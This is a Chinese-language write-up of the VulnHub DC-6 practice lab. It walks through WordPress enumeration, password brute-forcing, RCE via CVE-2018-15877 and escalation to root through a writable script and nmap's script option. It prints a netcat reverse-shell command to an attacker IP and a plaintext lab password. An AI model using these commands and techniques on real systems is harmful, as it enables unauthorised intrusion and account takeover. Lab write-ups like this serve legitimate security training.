写在前面
靶场链接:
https://www.vulnhub.com/entry/dc-6,315/
有些知识点在DC:1
中提到,可以翻阅
DC:1
信息搜集
存活扫描
这里61
是网关 141
是物理机 164
为靶机 115
为攻击机
端口扫描
尝试查看,但是莫名跳转到一个wordy
的网页
但是抓包可以响应且响应码是200
这里是修改配置文件做到的,通过修改apache的htaccess文件
解决重定向
原理是伪静态来完成的,并不是走的重定向301或302,不过也是重定向的一种。
通过修改hosts文件,就可以浏览器访问了,当然,如果你想,就看包也可以
显然,这里是wordpress
的指纹,和前面一样使用wpscan
来扫描,使用的选项是-e
,枚举用户名选项。
更多详情,和wpscan
工具的信息,可以点击查看这里DC_2
通过api
接口爆破得到如下用户名
按照常规思路,这里就可以开始爆破了,不过我一开始爆破了很久都没啥反应。后面才发现,有如下的线索
使用这个命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
这个命令就是将kali
自带的大字典进行筛选,筛选关键字 k01
写入passwords.txt
文件,注意指定新的passwords.txt
字典
找到密码
拿到账户密码,分别尝试ssh
、网站后台
ssh
无法进入。
后台可以进入
后台RCE
随意点击看了看,没有什么特别的,安装了一个activity monitor
插件,突破点应该就是这里
编号:CVE-2018-15877
查找一下,能够RCE
直接调用该poc
脚本,成功进入,但是此时是低权限用户
在脚本中执行命令不方便,先反弹出来看看,使用如下命令直接nc
连接
nc 192.168.201.115 10050 -c /bin/bash
查找suid
文件 暂时没看到能明显提权的东西
敏感信息泄露
查询登录的用户下的家目录
找到一个类似备忘录的txt
文件,cat
一下,找到敏感信息,有一个用户graham GSo7isUM1D4
横向越权
同样尝试登录这个用户 ssh
就可以登录了
查看suid
文件,显然这里有一个不需要密码的脚本
查看该脚本,它是可写的,追加该脚本内容,让它反弹出来
反弹后就是jens
的账户了,继续查看suid
文件,这里有 nmap
经典suid
提权
提权
nmap
的提权点在于,它可以以当前权限运行脚本,这里写一个getroot.sh
使用nmap
的选项--script
来运行即可
提权成功,找到flag
文件